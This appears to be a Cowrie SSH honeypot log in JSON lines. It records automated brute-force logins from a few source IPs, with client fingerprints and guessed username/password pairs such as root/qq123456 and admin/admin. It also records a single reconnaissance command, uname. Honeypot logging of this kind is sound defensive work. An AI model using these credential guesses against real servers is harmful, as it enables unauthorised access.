{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44648,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2f2f69929ac","protocol":"ssh","message":"New connection: 212.227.125.160:44648 (1.2.3.4:22) [session: d2f2f69929ac]","sensor":"my-vps","timestamp":"2025-08-26T11:57:10.113344Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:10.115315Z","src_ip":"212.227.125.160","session":"d2f2f69929ac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:10.444265Z","src_ip":"212.227.125.160","session":"d2f2f69929ac"}
{"eventid":"cowrie.login.failed","username":"update","password":"update","message":"login attempt [update/update] failed","sensor":"my-vps","timestamp":"2025-08-26T11:57:11.143993Z","src_ip":"212.227.125.160","session":"d2f2f69929ac"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:12.240008Z","src_ip":"212.227.125.160","session":"d2f2f69929ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45416,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3541d5130e0","protocol":"ssh","message":"New connection: 212.227.125.160:45416 (1.2.3.4:22) [session: d3541d5130e0]","sensor":"my-vps","timestamp":"2025-08-26T11:57:15.809106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:15.809846Z","src_ip":"212.227.125.160","session":"d3541d5130e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:15.878901Z","src_ip":"212.227.125.160","session":"d3541d5130e0"}
{"eventid":"cowrie.login.failed","username":"cloudendure","password":"cloudendure","message":"login attempt [cloudendure/cloudendure] failed","sensor":"my-vps","timestamp":"2025-08-26T11:57:16.452652Z","src_ip":"212.227.125.160","session":"d3541d5130e0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:17.505769Z","src_ip":"212.227.125.160","session":"d3541d5130e0"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41396,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec717d16dd2b","protocol":"ssh","message":"New connection: 83.168.105.65:41396 (1.2.3.4:22) [session: ec717d16dd2b]","sensor":"my-vps","timestamp":"2025-08-26T11:57:20.251051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:20.252016Z","src_ip":"83.168.105.65","session":"ec717d16dd2b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:20.289043Z","src_ip":"83.168.105.65","session":"ec717d16dd2b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:57:20.403071Z","src_ip":"83.168.105.65","session":"ec717d16dd2b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:21.442901Z","src_ip":"83.168.105.65","session":"ec717d16dd2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46188,"dst_ip":"1.2.3.4","dst_port":22,"session":"140c2f81d6d7","protocol":"ssh","message":"New connection: 212.227.125.160:46188 (1.2.3.4:22) [session: 140c2f81d6d7]","sensor":"my-vps","timestamp":"2025-08-26T11:57:22.774592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:22.775495Z","src_ip":"212.227.125.160","session":"140c2f81d6d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:22.836306Z","src_ip":"212.227.125.160","session":"140c2f81d6d7"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:57:23.129788Z","src_ip":"212.227.125.160","session":"140c2f81d6d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:57:23.449657Z","src_ip":"212.227.125.160","session":"140c2f81d6d7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:57:23.450403Z","src_ip":"212.227.125.160","session":"140c2f81d6d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:23.558102Z","src_ip":"212.227.125.160","session":"140c2f81d6d7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:23.559343Z","src_ip":"212.227.125.160","session":"140c2f81d6d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46954,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa0b5ca07fb0","protocol":"ssh","message":"New connection: 212.227.125.160:46954 (1.2.3.4:22) [session: fa0b5ca07fb0]","sensor":"my-vps","timestamp":"2025-08-26T11:57:27.432399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:27.446585Z","src_ip":"212.227.125.160","session":"fa0b5ca07fb0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:27.614821Z","src_ip":"212.227.125.160","session":"fa0b5ca07fb0"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-26T11:57:28.039208Z","src_ip":"212.227.125.160","session":"fa0b5ca07fb0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:29.092939Z","src_ip":"212.227.125.160","session":"fa0b5ca07fb0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47722,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f9dd3ecad73","protocol":"ssh","message":"New connection: 212.227.125.160:47722 (1.2.3.4:22) [session: 4f9dd3ecad73]","sensor":"my-vps","timestamp":"2025-08-26T11:57:33.590217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:33.591261Z","src_ip":"212.227.125.160","session":"4f9dd3ecad73"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:33.650063Z","src_ip":"212.227.125.160","session":"4f9dd3ecad73"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:57:33.813187Z","src_ip":"212.227.125.160","session":"4f9dd3ecad73"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:57:33.987007Z","src_ip":"212.227.125.160","session":"4f9dd3ecad73"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:57:33.987732Z","src_ip":"212.227.125.160","session":"4f9dd3ecad73"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:34.040596Z","src_ip":"212.227.125.160","session":"4f9dd3ecad73"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:34.041704Z","src_ip":"212.227.125.160","session":"4f9dd3ecad73"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":38576,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7767ec64296","protocol":"ssh","message":"New connection: 83.168.105.65:38576 (1.2.3.4:22) [session: e7767ec64296]","sensor":"my-vps","timestamp":"2025-08-26T11:57:35.825409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:35.826201Z","src_ip":"83.168.105.65","session":"e7767ec64296"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:35.862056Z","src_ip":"83.168.105.65","session":"e7767ec64296"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-26T11:57:35.970321Z","src_ip":"83.168.105.65","session":"e7767ec64296"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:37.009331Z","src_ip":"83.168.105.65","session":"e7767ec64296"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48492,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae848e9e1481","protocol":"ssh","message":"New connection: 212.227.125.160:48492 (1.2.3.4:22) [session: ae848e9e1481]","sensor":"my-vps","timestamp":"2025-08-26T11:57:39.349861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:39.350791Z","src_ip":"212.227.125.160","session":"ae848e9e1481"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:57:39.401775Z","src_ip":"212.227.125.160","session":"ae848e9e1481"}
{"eventid":"cowrie.login.failed","username":"systemx","password":"systemx","message":"login attempt [systemx/systemx] failed","sensor":"my-vps","timestamp":"2025-08-26T11:57:39.559001Z","src_ip":"212.227.125.160","session":"ae848e9e1481"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:57:40.620824Z","src_ip":"212.227.125.160","session":"ae848e9e1481"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51590,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1ac4720b33e","protocol":"ssh","message":"New connection: 212.227.235.229:51590 (1.2.3.4:22) [session: c1ac4720b33e]","sensor":"my-vps","timestamp":"2025-08-26T11:57:41.590015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:57:42.037316Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:57:42.038009Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.login.success","username":"root","password":"password1","message":"login attempt [root/password1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:57:43.681081Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:57:44.568387Z","src_ip":"212.227.235.229","session":"c1ac4720b33e"}
